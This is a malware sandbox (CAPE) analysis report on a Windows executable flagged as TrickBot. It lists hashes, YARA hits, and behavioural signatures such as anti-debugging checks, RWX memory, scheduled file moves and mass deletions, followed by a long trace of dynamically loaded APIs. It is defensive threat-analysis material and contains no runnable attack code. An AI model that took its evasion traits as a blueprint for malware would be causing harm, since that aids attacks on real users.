2019-08-13 23:41:59,098 [root] INFO: Process with pid 3868 has terminated
2019-08-13 23:41:59,098 [root] INFO: Process with pid 2756 has terminated
2019-08-13 23:44:48,450 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2019-08-13 23:44:48,450 [root] INFO: Created shutdown mutex.
2019-08-13 23:44:49,464 [root] INFO: Shutting down package.
2019-08-13 23:44:49,464 [root] INFO: Stopping auxiliary modules.
2019-08-13 23:44:49,464 [root] INFO: Finishing auxiliary modules.
2019-08-13 23:44:49,464 [root] INFO: Shutting down pipe server and dumping dropped files.
2019-08-13 23:44:49,464 [root] WARNING: File at path "C:\bbTJiLOfj\debugger" does not exist, skip.
2019-08-13 23:44:49,480 [root] INFO: Analysis completed.

MalScore

10.0

TrickBot

Machine

Name Label Manager Started On Shutdown On
target-01 target-01 ESX 2019-08-13 22:41:12 2019-08-13 22:45:04

File Details

File Name ade7ed347881c8a422484a7fa8be461b460a6f7204fa8498e29810f3ca67e829
File Size 675094 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 37c059b7484b539e0be9706d156f228c
SHA1 74d05c52681fea521bb2bb5a8d33ee10081eb0d8
SHA256 ade7ed347881c8a422484a7fa8be461b460a6f7204fa8498e29810f3ca67e829
SHA512 ed9ba25ccde8163a6c6de17f6ce907cde6ecf3112dd428093adddea55538a146fb7deb192722c4692c3eb0a9300e48212b86b708de3f682003707f6d567c6282
CRC32 42FD3886
Ssdeep 12288:gMu7KFpzOscDD85KBq6p26j4muXNS8FBsM0Nb:gMFnzOsMLhp26Um86M0Nb
TrID
  • 61.7% (.EXE) Win64 Executable (generic) (27625/18/4)
  • 14.6% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
  • 10.0% (.EXE) Win32 Executable (generic) (4508/7/1)
  • 4.5% (.EXE) OS/2 Executable (generic) (2029/13)
  • 4.4% (.EXE) Generic Win/DOS Executable (2002/3)
ClamAV None matched
Yara None matched
CAPE Yara None matched
Resubmit sample

Signatures

Behavioural detection: Executable code extraction
SetUnhandledExceptionFilter detected (possible anti-debug)
Scheduled file move on reboot detected
File Move on Reboot: Old: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7K5UWNQAAA284NII014E.temp -> New: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
File Move on Reboot: Old: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5ZNGV2JSA4OCNZIV8RKJ.temp -> New: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 3868 trigged the Yara rule 'TrickBot'
Hit: PID 2352 trigged the Yara rule 'shellcode'
Creates RWX memory
Possible date expiration check, exits too soon after checking local time
process: exlxo5YyAuKqn.exe, PID 740
Anomalous file deletion behavior detected (10+)
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4e532.TMP
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.2952.15001147
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.2952.15001147
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.2952.15001147
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4e8ab.TMP
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.1628.15001881
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.1628.15001896
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.1628.15001896
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.624.15891007
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.624.15891007
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.624.15891007
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.2056.15001974
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.2056.15001974
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.2056.15001974
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IDMN0LR05DQCP1U000ZS.temp
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.3004.15002941
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.3004.15002941
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.3004.15002941
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4ed4d.TMP
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.1964.15003051
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.1964.15003051
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.1964.15003066
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf28611.TMP
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.920.15894096
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.920.15894096
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.920.15894096
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4f3f1.TMP
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.3132.15004767
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.3132.15004767
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.3132.15004767
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4f317.TMP
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.3640.15004595
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.3640.15004595
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.3640.15004595
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf289c9.TMP
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.3112.15895047
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.3112.15895047
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.3112.15895047
Guard pages use detected - possible anti-debugging.
Dynamic (imported) function loading detected
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: comctl32.dll/
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: ntdll.dll/memcpy
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptEncrypt
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTBASE.dll/SystemFunction040
DynamicLoader: CRYPTBASE.dll/SystemFunction041
DynamicLoader: CRYPTSP.dll/CryptEncrypt
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: comctl32.dll/
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: shell32.dll/
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: shell32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: profapi.dll/
DynamicLoader: LINKINFO.dll/CreateLinkInfoW
DynamicLoader: USER32.dll/IsCharAlphaW
DynamicLoader: USER32.dll/CharPrevW
DynamicLoader: ntshrui.dll/GetNetResourceFromLocalPathW
DynamicLoader: srvcli.dll/NetShareEnum
DynamicLoader: cscapi.dll/CscNetApiGetInterface
DynamicLoader: slc.dll/SLGetWindowsInformationDWORD
DynamicLoader: SHLWAPI.dll/PathRemoveFileSpecW
DynamicLoader: LINKINFO.dll/DestroyLinkInfo
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/GetSecurityInfo
DynamicLoader: ADVAPI32.dll/SetSecurityInfo
DynamicLoader: ADVAPI32.dll/GetSecurityDescriptorControl
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: mscoree.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: mscoreei.dll/RegisterShimImplCallback
DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
DynamicLoader: mscoreei.dll/SetShellShimInstance
DynamicLoader: mscoreei.dll/OnShimDllMainCalled
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx_RetAddr
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx
DynamicLoader: SHLWAPI.dll/UrlIsW
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: msvcrt.dll/_set_error_mode
DynamicLoader: msvcrt.dll/?set_terminate@@YAP6AXXZP6AXXZ@Z
DynamicLoader: msvcrt.dll/_get_terminate
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: mscoree.dll/GetProcessExecutableHeap
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
DynamicLoader: mscorwks.dll/SetLoadedByMscoree
DynamicLoader: mscorwks.dll/DllGetClassObjectInternal
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsW
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: ADVAPI32.dll/GetTraceLoggerHandle
DynamicLoader: ADVAPI32.dll/GetTraceEnableLevel
DynamicLoader: ADVAPI32.dll/GetTraceEnableFlags
DynamicLoader: ADVAPI32.dll/TraceEvent
DynamicLoader: mscoree.dll/IEE
DynamicLoader: mscoreei.dll/IEE_RetAddr
DynamicLoader: mscoreei.dll/IEE
DynamicLoader: mscorwks.dll/IEE
DynamicLoader: mscoree.dll/GetStartupFlags
DynamicLoader: mscoreei.dll/GetStartupFlags_RetAddr
DynamicLoader: mscoreei.dll/GetStartupFlags
DynamicLoader: mscoree.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetHostConfigurationFile_RetAddr
DynamicLoader: mscoreei.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetCORVersion_RetAddr
DynamicLoader: mscoreei.dll/GetCORVersion
DynamicLoader: mscoree.dll/GetCORSystemDirectory
DynamicLoader: mscoreei.dll/GetCORSystemDirectory_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream
DynamicLoader: ntdll.dll/RtlVirtualUnwind
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: kernel32.dll/SetThreadStackGuarantee
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/AddVectoredContinueHandler
DynamicLoader: kernel32.dll/RemoveVectoredContinueHandler
DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW
DynamicLoader: shell32.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/FlushProcessWriteBuffers
DynamicLoader: kernel32.dll/GetWriteWatch
DynamicLoader: kernel32.dll/ResetWriteWatch
DynamicLoader: kernel32.dll/CreateMemoryResourceNotification
DynamicLoader: kernel32.dll/QueryMemoryResourceNotification
DynamicLoader: kernel32.dll/GlobalMemoryStatusEx
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoGetContextToken
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetUserDefaultUILanguage
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetFullPathName
DynamicLoader: kernel32.dll/GetFullPathNameW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetFileAttributesEx
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: version.dll/GetFileVersionInfoSize
DynamicLoader: version.dll/GetFileVersionInfoSizeW
DynamicLoader: version.dll/GetFileVersionInfo
DynamicLoader: version.dll/GetFileVersionInfoW
DynamicLoader: version.dll/VerQueryValue
DynamicLoader: version.dll/VerQueryValueW
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: mscoree.dll/ND_RI2
DynamicLoader: mscoreei.dll/ND_RI2_RetAddr
DynamicLoader: mscoreei.dll/ND_RI2
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcpy
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: version.dll/VerLanguageName
DynamicLoader: version.dll/VerLanguageNameW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcessIdW
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/OpenProcessW
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: PSAPI.DLL/EnumProcessModulesW
DynamicLoader: PSAPI.DLL/GetModuleInformation
DynamicLoader: PSAPI.DLL/GetModuleInformationW
DynamicLoader: PSAPI.DLL/GetModuleBaseName
DynamicLoader: PSAPI.DLL/GetModuleBaseNameW
DynamicLoader: PSAPI.DLL/GetModuleFileNameEx
DynamicLoader: PSAPI.DLL/GetModuleFileNameExW
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/GetExitCodeProcessW
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtQuerySystemInformationW
DynamicLoader: USER32.dll/EnumWindows
DynamicLoader: USER32.dll/EnumWindowsW
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: USER32.dll/GetWindowThreadProcessIdW
DynamicLoader: kernel32.dll/WerSetFlags
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetUserDefaultLocaleName
DynamicLoader: kernel32.dll/GetUserDefaultLocaleNameW
DynamicLoader: kernel32.dll/GetEnvironmentVariable
DynamicLoader: kernel32.dll/GetEnvironmentVariableW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/CryptCreateHash
DynamicLoader: ADVAPI32.dll/CryptDestroyHash
DynamicLoader: ADVAPI32.dll/CryptHashData
DynamicLoader: ADVAPI32.dll/CryptGetHashParam
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptExportKey
DynamicLoader: ADVAPI32.dll/CryptGenKey
DynamicLoader: ADVAPI32.dll/CryptGetKeyParam
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptVerifySignatureA
DynamicLoader: ADVAPI32.dll/CryptSignHashA
DynamicLoader: ADVAPI32.dll/CryptGetProvParam
DynamicLoader: ADVAPI32.dll/CryptGetUserKey
DynamicLoader: ADVAPI32.dll/CryptEnumProvidersA
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: mscoreei.dll/_CorDllMain_RetAddr
DynamicLoader: mscoreei.dll/_CorDllMain
DynamicLoader: mscoree.dll/GetTokenForVTableEntry
DynamicLoader: mscoree.dll/SetTargetForVTableEntry
DynamicLoader: mscoree.dll/GetTargetForVTableEntry
DynamicLoader: mscoreei.dll/LoadLibraryShim_RetAddr
DynamicLoader: mscoreei.dll/LoadLibraryShim
DynamicLoader: culture.dll/ConvertLangIdToCultureName
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfo
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfoW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/GetCurrentProcessW
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetTokenInformationW
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/LocalAllocW
DynamicLoader: mscoree.dll/ND_RI4
DynamicLoader: mscoreei.dll/ND_RI4_RetAddr
DynamicLoader: mscoreei.dll/ND_RI4
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/DuplicateTokenExW
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: ADVAPI32.dll/CheckTokenMembershipW
DynamicLoader: kernel32.dll/GetConsoleTitle
DynamicLoader: kernel32.dll/GetConsoleTitleW
DynamicLoader: mscorjit.dll/getJit
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: kernel32.dll/SetConsoleTitle
DynamicLoader: kernel32.dll/SetConsoleTitleW
DynamicLoader: kernel32.dll/SetConsoleCtrlHandler
DynamicLoader: kernel32.dll/SetConsoleCtrlHandlerW
DynamicLoader: kernel32.dll/CreateEvent
DynamicLoader: kernel32.dll/CreateEventW
DynamicLoader: ntdll.dll/WinSqmIsOptedIn
DynamicLoader: kernel32.dll/ExpandEnvironmentStrings
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: shfolder.dll/SHGetFolderPath
DynamicLoader: shfolder.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/SetEnvironmentVariable
DynamicLoader: kernel32.dll/SetEnvironmentVariableW
DynamicLoader: kernel32.dll/GetACP
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetFileType
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetSystemInfo
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: ADVAPI32.dll/RegQueryInfoKey
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumValue
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyEx
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: secur32.dll/GetUserNameEx
DynamicLoader: secur32.dll/GetUserNameExW
DynamicLoader: ADVAPI32.dll/GetUserName
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: ADVAPI32.dll/RegisterEventSource
DynamicLoader: ADVAPI32.dll/RegisterEventSourceW
DynamicLoader: ADVAPI32.dll/DeregisterEventSource
DynamicLoader: ADVAPI32.dll/ReportEvent
DynamicLoader: ADVAPI32.dll/ReportEventW
DynamicLoader: kernel32.dll/GetLogicalDrives
DynamicLoader: kernel32.dll/GetDriveType
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetVolumeInformation
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: kernel32.dll/GetCurrentDirectory
DynamicLoader: kernel32.dll/GetCurrentDirectoryW
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: mscoree.dll/IEE
DynamicLoader: kernel32.dll/GetStdHandle
DynamicLoader: kernel32.dll/GetStdHandleW
DynamicLoader: kernel32.dll/GetConsoleMode
DynamicLoader: kernel32.dll/GetConsoleModeW
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/SetThreadUILanguageW
DynamicLoader: kernel32.dll/FindFirstFile
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: mscoree.dll/CorExitProcess
DynamicLoader: mscoreei.dll/CorExitProcess_RetAddr
DynamicLoader: mscoreei.dll/CorExitProcess
DynamicLoader: mscorwks.dll/CorExitProcess
DynamicLoader: mscorwks.dll/_CorDllMain
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: kernel32.dll/AddRefActCtx
DynamicLoader: kernel32.dll/ReleaseActCtx
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: kernel32.dll/GetCurrentActCtx
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: CRYPTBASE.dll/SystemFunction036
